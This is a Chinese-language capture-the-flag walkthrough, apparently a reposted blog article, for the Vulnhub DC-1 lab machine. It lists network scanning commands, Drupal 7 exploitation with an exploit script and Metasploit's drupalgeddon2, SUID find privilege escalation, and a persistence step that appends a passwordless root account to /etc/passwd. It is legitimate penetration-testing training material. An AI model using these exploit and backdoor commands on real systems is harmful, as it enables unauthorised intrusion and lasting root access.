【宇将军入侵靶机系列】Vulnhub:DC-1

admin 2023年2月16日22:15:42评论41 views字数 4075阅读13分35秒阅读模式

MUSIC

学习要求

  1. DC-1这个靶机系列难度属于简单入门级别,适合新手刷,能够快速熟悉渗透的流程
  2. 明白信息收集对整个渗透过程来说至关重要,突出在端口扫描和网站指纹的收集
  3. msfconsole框架的熟悉使用,对漏洞的查找和利用
  4. 了解suid提权find命令
  5. 熟悉肾透基本流程而不重在寻找Flag

靶场环境配置

  1. 修改为usb 1.0
  2. 把网络连接方式修改为NAT即可

首先靶机环境攻击机环境必须通过NAT模式可以保证两者处于同一个内网环境中

切记 vmware 和 virtualbox 的虚拟网卡可能网段不同

所以要保证kali和靶机在同一个网段

否则无法扫描到相应的靶机

主机信息收集

方法一:ARP扫描工具arp-scan

arp-scan是Kali Linux自带的一款ARP扫描工具。该工具可以进行单一目标扫描,也可以进行批量扫描。批量扫描的时候,用户可以通过CIDR、地址范围或者列表文件的方式指定。该工具允许用户定制ARP包,构建非标准数据包。同时,该工具会自动解析Mac地址,给出MAC对应的硬件厂商,帮助用户确认目标。

arp-scan -l

arp-scan -I eth0 -l (-I 指定网卡扫描)
【宇将军入侵靶机系列】Vulnhub:DC-1
【宇将军入侵靶机系列】Vulnhub:DC-1

方法二:Masscan 最快的扫描器

masscan 192.168.112.0/24 --ports 0-65535  (扫描c段就可以了,靶机和攻击机处于同一c段下)
【宇将军入侵靶机系列】Vulnhub:DC-1

方法三:Netdiscover -i 网卡-r 网段

netdiscover -i eth0 -r 192.168.112.0/24
【宇将军入侵靶机系列】Vulnhub:DC-1

方法四:Nmap工具扫描网段

nmap -sT -p- -min-rate 3000 192.168.112.0/24
192.168.112.1

7680/tcp open pando-pub
MAC Address: 00:50:56:C0:00:08 (VMware)

192.168.112.2

53/tcp open domain
MAC Address: 00:50:56:FF:5D:5B (VMware)

192.168.112.141

22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
54669/tcp open unknown
MAC Address: 00:0C:29:88:A7:3E (VMware)

192.168.112.254

Not shown: 65535 filtered tcp ports (no-response)
MAC Address: 00:50:56:E5:02:46 (VMware)

192.168.112.128

5003/tcp open filemaker

【宇将军入侵靶机系列】Vulnhub:DC-1

nmap不是吹的,好好利用该工具。

其他扫描网段的方法自己补充

甄别收集资产

得到以下信息

192.168.112.1   00:50:56:c0:00:08       VMware, Inc.
192.168.112.2 00:50:56:ff:5d:5b VMware, Inc.
192.168.112.141 00:0c:29:88:a7:3e VMware, Inc.
192.168.112.254 00:50:56:e5:02:46 VMware, Inc.

攻击机IP:192.168.112.128

接下来在这四个IP地址中甄别有效资产IP地址

nmap扫描

参数:

-sV服务指纹识别 可以探测目标系统的服务
-A 入侵式扫描 -p- 扫描全部端口
nmap -sV -A -p- 192.168.112.1
nmap -sV -A -p- 192.168.112.2
nmap -sV -A -p- 192.168.112.141
nmap -sV -A -p- 192.168.112.254
【宇将军入侵靶机系列】Vulnhub:DC-1
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)

80/tcp open http Apache httpd 2.2.22 ((Debian))
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-title: Welcome to Drupal Site | Drupal Site
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Apache/2.2.22 (Debian)

111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 33518/udp6 status
| 100024 1 51519/udp status
| 100024 1 54669/tcp status
|_ 100024 1 58200/tcp6 status

54669/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:88:A7:3E (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 192.168.112.141

我们在这里可以看到开放的端口服务,指纹信息,中间件,等等

以及敏感文件

发现目标主机IP地址为192.168.112.141,开启了22端口和80端口 

还有111和39069端口

端口分析

80 端口

【宇将军入侵靶机系列】Vulnhub:DC-1

发现web资产

【宇将军入侵靶机系列】Vulnhub:DC-1

经过使用wappalyzer仔细的分析

发现这是一个非常知名的 CMS:Drupal version7

这些文件都要细致的查看,信息泄露出CMS版本信息
robots.txt
CHANGELOG.txt
cron.php
INSTALL.mysql.txt
INSTALL.pgsql.txt
INSTALL.sqlite.txt
install.php
INSTALL.txt
LICENSE.txt
MAINTAINERS.txt

其他端口

在率先发现Web资产时,将突破口重心放在Web资产上

22端口一般只能暴力破解,其他端口等后续实在没有思路下再做考虑

Web资产打点

使用工具:msfconsole

【宇将军入侵靶机系列】Vulnhub:DC-1

搜索CMS相关漏洞:search Drupal 7

【宇将军入侵靶机系列】Vulnhub:DC-1

查看CMS漏洞利用:searchsploit drupal 7

【宇将军入侵靶机系列】Vulnhub:DC-1

尝试使用34992号脚本来进行 admin用户的添加:

【宇将军入侵靶机系列】Vulnhub:DC-1

迁移34992号脚本: searchsploit 34992

【宇将军入侵靶机系列】Vulnhub:DC-1

利用该脚本进行admin用户添加:

python2 34992.py -t http://192.168.112.141 -u jb -p 123456

【宇将军入侵靶机系列】Vulnhub:DC-1

注意exp的路径,已经python的版本

【宇将军入侵靶机系列】Vulnhub:DC-1

成功利用

【宇将军入侵靶机系列】Vulnhub:DC-1

登录网站继续探索:

【宇将军入侵靶机系列】Vulnhub:DC-1

后渗透拿shell

使用MSF框架进行主机攻击

【宇将军入侵靶机系列】Vulnhub:DC-1

使用exploit/unix/webapp/drupal_drupalgeddon2

【宇将军入侵靶机系列】Vulnhub:DC-1

显示设置 show options

【宇将军入侵靶机系列】Vulnhub:DC-1
【宇将军入侵靶机系列】Vulnhub:DC-1

设置被攻击目标地址 set rhost 192.168.112.141

【宇将军入侵靶机系列】Vulnhub:DC-1

建立连接成功,执行后渗透攻击

提权及其权限维持

查看用户权限,非root用户权限,www-data权限时很小的

【宇将军入侵靶机系列】Vulnhub:DC-1

发现受害者机器装有python

【宇将军入侵靶机系列】Vulnhub:DC-1

可以使用python美化shell界面,然后更加直观的显示用户

其实就是拿bash

python -c 'import pty;pty.spawn("/bin/bash")'

【宇将军入侵靶机系列】Vulnhub:DC-1
www-data@DC-1:/var/www$ whoami
www-data

查找flag.txt,发现有个flag4查看其内容

【宇将军入侵靶机系列】Vulnhub:DC-1

没鸡巴用cat /home/flag4/flag4.txt

【宇将军入侵靶机系列】Vulnhub:DC-1

发现flag4的提示中有个find

这里有root权限的也有find是不是能用find提权呢?

先看看是否存在sudo提权

【宇将军入侵靶机系列】Vulnhub:DC-1

不存在

再看看是否存在find提权

结合flag3的提示信息

【宇将军入侵靶机系列】Vulnhub:DC-1

尝试使用find命令实现suid提权

https://blog.csdn.net/u012206617/article/details/125161512

find命令提权常用命令

find . -exec /bin/sh ; -quit
【宇将军入侵靶机系列】Vulnhub:DC-1

权限维持:

添加用户jbjb无密码,root权限:

echo "jbjb::0:0:root:/root:/bin/bash" >>/etc/passwd
【宇将军入侵靶机系列】Vulnhub:DC-1

成功登录

【宇将军入侵靶机系列】Vulnhub:DC-1

查看最后的flag.txt

【宇将军入侵靶机系列】Vulnhub:DC-1

结束!

总结

DC-1中的flag我没有一个一个去找,没啥意思,我重在梳理流程。

这篇文章涵盖了所有flag的位置

顺便提及ssh也是可以用九头蛇爆破的

https://www.bbsmax.com/A/amd0Qv8Lzg/

有兴趣自己看看吧

https://zhuanlan.zhihu.com/p/136370154
【宇将军入侵靶机系列】Vulnhub:DC-1

原文始发于微信公众号(猫因的安全):【宇将军入侵靶机系列】Vulnhub:DC-1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月16日22:15:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【宇将军入侵靶机系列】Vulnhub:DC-1https://cn-sec.com/archives/1280179.html

发表评论

匿名网友 填写信息